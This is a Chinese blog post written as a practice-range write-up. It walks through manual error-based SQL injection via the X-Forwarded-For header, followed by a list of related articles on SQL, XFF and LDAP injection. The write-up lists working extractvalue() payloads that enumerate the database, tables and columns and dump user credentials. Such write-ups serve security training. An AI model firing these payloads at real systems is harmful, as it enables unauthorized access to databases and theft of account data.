XFF手工注入

最新推荐文章于 2025-11-06 09:12:02 发布
原创 最新推荐文章于 2025-11-06 09:12:02 发布 · 912 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

题目来源:墨者学院

点进去之后,只有一个登录界面,随便试一个账号密码,抓包。

在头部加上XFF字段:发现能看到自己设置的值

 然后开始注入,用的是报错注入函数extractvalue(),第一个参数时XML文档对象的名称,我设置为null,第二个参数是Xpath格式的字符串,原理是在第二个参数传sql注入语句,然后由于不是Xpath格式,就报错,然后语句被执行,得到结果。

构造payload:1.1.1.1'and extractvalue(1,concat(1,(select database()))) and '1'='1,爆库名

 构造payload:1.1.1.1'and extractvalue(1,concat(1,(select group_concat(table_name)  from information_schema.tables where table_schema=database()))) and '1'='1 爆表名

 构造payload:1.1.1.1'and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='logins'))) and '1'='1 爆字段名

构造payload:1.1.1.1'and extractvalue(1,concat(1,(select GROUP_CONCAT(username) from logins))) and '1'='1爆字段值

发现好像是加密的?换另一个表,也发现username和password字段

 构造payload:1.1.1.1'and extractvalue(1,concat(1,(select GROUP_CONCAT(username) from user))) and '1'='1爆字段值

 然后就可以登录了

其实只要改变concat里的select语句就可以了,就是普通的报错注入

 

GiDunPar
关注
web渗透--30--LDAP注入
武天旭的博客
09-16 5583
1、LDAP概述 轻量目录访问协议(LDAP)是被用来存储有关用户,主机和其他许多对象的信息。LDAP注入是一个服务器端的攻击,它允许关于用户和表示主机的敏感信息在一个LDAP结构中被披露、篡改或插入其他信息。这是通过操纵输入参数,再传递给内部的搜索、增加、修改函数来实现的。
SQL注入详解
热门推荐
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
浅谈“XFF注入
→_→
05-11 6548
漏洞名称: XFF注入、X-Forwarded-for注入 描述: XFF,是X-Forwarded-for的缩写,XFF注入SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。 检测条件: 1.Web业务运行正常 2.HTTP Header中存在X-Forwarded-for参数的调用 检测方法: 假设XFF注入PHP代码如下: 确定漏洞的存在 使用burpsuite工具进行抓包,并用Re
MySQL SQL注入防御全攻略:原理、攻击与防护实践
最新发布
✨ 欢迎来到【Seal ^_^ 的优快云博客】!✨
11-06 1万+
SQL注入SQL Injection)是一种将恶意SQL代码插入到应用程序输入参数中,从而欺骗服务器执行非预期SQL命令的攻击技术。fill:#333;color:#333;color:#333;fill:none;攻击者构造恶意输入应用程序拼接SQL数据库执行恶意代码数据泄露/破坏开发阶段:采用参数化查询、输入验证架构层面:实现最小权限、网络隔离运维层面:定期扫描、及时更新随着技术的发展,新型防护技术如RASP(运行时应用自我保护)和AI驱动的异常检测将成为未来防御SQL注入的重要方向。
XFF注入【墨者靶场】
qq_68163788的博客
06-05 1084
X-Forwarded-For是一个HTTP请求头部信息,用于标识HTTP请求经过的代理服务器IP地址。通常情况下,当一个客户端向服务器发送请求时,服务器会将请求来源的IP地址记录在日志中,以便进行信息追踪和安全检测。 然而,当请求经过多个代理服务器时,服务器可能无法准确判断请求的真实发起者IP地址。这时就需要使用X-Forwarded-For头部信息来记录请求经过的代理服务器IP地址。
sql注入----xff注入
2402_83134109的博客
12-24 619
因为这里并没有看到关于我们输入的1,2,3的回显位置,因此采用报错注入。(报错注入在12月19号的那篇文章,如有需要,请自行观看)登陆成功后回显了User Agent 的相关信息,我们使用burpsuite进行抓包拦截,对其 User Agent 进行修改。经过尝试得到有三列,这里的难点还是要闭合括号,并使用#注释掉后面的内容。并且观察报错内容,这里我们除了闭合单引号,还有一个括号也需要闭合。使用单引号尝试闭合,出现SQL语句报错,因此确实存在注入XFF,是X-Forwarded-for的缩写,
Web安全原理剖析(十一)——XFF注入攻击
Phantom03167的博客
10-03 1万+
XFF注入攻击
x-forwarded-for手工注入(超详细)
1
05-12 1576
使用靶场来进行演示。 访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下 虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己加上。 发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...
墨者学院-HTTP头注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1915
一、审题 这题从题目,也可以看放包后的回显可以知道是http头的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http头里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF头 ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
CTF实验:X-Forwarded-For头注入
floyd_art的博客
04-01 1716
SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 ...
TC377 - MTU MBIST之单/双 bit数据错误注入
舊梦的博客
11-28 1683
启用内存测试后,为了验证功能的有效性,需要用户手动去注入错误,进而验证内存测试功能是否有效。在没有错误发生的情况下,手动注入错误是很有必要的。对于无损测试而言,可以通过ECCMAP在NDT之前用错误的ECC编码某一个word,从而注入一个数据错误。对于有损测试而言,可以通过RANGE.INJERR位注入数据错误。注入错误后,可以测试所有正常的诊断和通知——也就是说,触发警报,在无损测试期间在ETRR/ERRINFO中跟踪错误。
XFF注入手工+sqlmap)
渗透测试
09-05 537
靶场链接 视频链接 XFF注入手工+sqlmap)
sqlXFF注入
weixin_45007073的博客
01-03 958
首先介绍一下X-Forward-For是什么东西 X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。 准备工作 开启靶场:这里我选用的是墨客的靶场 漏洞复现过程 先使用默认admin和
SQL注入XFF注入攻击
coderge's 优快云 Blog.
09-19 3567
目录 在线靶场地址:https://www.mozhe.cn/bug/detail/10 背景介绍 实训目标 解题方向 获取当前数据库的库名 然后获取表名 再获取字段名: 然后获得数据: 在线靶场地址:https://www.mozhe.cn/bug/detail/10 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 掌握SQL注入的基本原理; 了解服务器获取客户端IP的方式; 了解SQL注入的工具使用; 解题...
《WEB安全渗透测试》(10)SQL注入实战:XFF注入
午夜安全
10-24 1万+
《WEB安全渗透测试》(10)SQL注入实战:XFF注入 X-Forwarded-For简称XFF头,它代表了客户端的真实IP,通过修改他的值就可以伪造客户端IP。1)判断是否存在注入使用Burp的Repeater模块对请求进行修改,分别修改X-Forwarded-For的值如下所示:X-Forwarded-for: 127.0.0.1X-Forwarded-for: 127.0.0.1’X-Forwarded-for: 127.0.0.1' and 1=1#......
【网络安全】SQL注入-XFF注入
边缘拼命划水的小陈
04-07 440
HTTP_X_FORWARDED_FOR的值没有进行过滤拼接SQL语句带入查询造成注入。getenv(‘HTTP_X_FORWARDED_FOR’)获取远程客户端的。5. 剩余步骤与联合注入无异,不在展示。4.使用联合查询查看相关信息。2. 判断是否存在注入点。》经判断字段数量为4。
SQL 注入漏洞(十四)xff 注入攻击
不秃头的程序Yang
06-22 3068
二、代码分析
XFF 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-29 1789
XFF 注入漏洞原理以及修复方法
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
2301_77160226的博客
08-27 2487
SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
sqlmap如何进行XFF注入
04-07
1. 确定目标网站存在SQL注入漏洞,并确定该漏洞是利用XFF头信息进行的注入。 2. 下载并安装SQLMap。 3. 使用以下命令开始进行XFF注入测试: ``` sqlmap -u ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值